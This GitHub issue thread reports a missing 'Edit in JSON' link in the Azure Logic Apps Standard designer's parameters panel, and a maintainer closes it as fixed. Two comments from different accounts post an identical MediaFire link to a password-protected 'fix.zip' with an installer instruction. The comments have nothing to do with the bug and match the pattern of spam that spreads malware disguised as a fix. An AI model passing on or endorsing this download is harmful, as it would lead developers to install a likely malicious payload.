### ISSUE TITLE
Workflow parameters : Edit in JSON' link not found at the bottom of the parameters panel

### ISSUE THREAD

**Issue by vgouth** [Azure/LogicAppsUX#5497]
### Describe the Bug with repro steps 

1\.Create a new stateful logic app in standard, open the designer.

 2\.Validate if 'Parameters' command button shows

 3\.Add some parameters, save and run it.

**Expected:** Click on the link 'Edit in JSON', found at the bottom of the parameters panel.

**Actual:**' Edit in JSON' link not found at the bottom of the parameters panel

### What type of Logic App Is this happening in? 

Standard (Portal)

### Which operating system are you using? 

Windows

### Are you using new designer or old designer 

New Designer

### Did you refer to the TSG before filing this issue? [https://aka.ms/lauxtsg](<https://aka.ms/lauxtsg>) 

Yes

### Workflow JSON 

*No response*

### Screenshots or Videos 

![image](<https://github.com/user-attachments/assets/3ac54256-f185-4e36-8f36-6e80524a583c>)

![image](<https://github.com/user-attachments/assets/d30a097c-73da-450b-a1eb-0e7f9c4afbc7>)

### Browser 

Edge

### Additional context 

**Version:** 2\.40826.1.3

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by preetriti1** [comment]
This is fixed with Riley's change in portal already in staging so closing this.
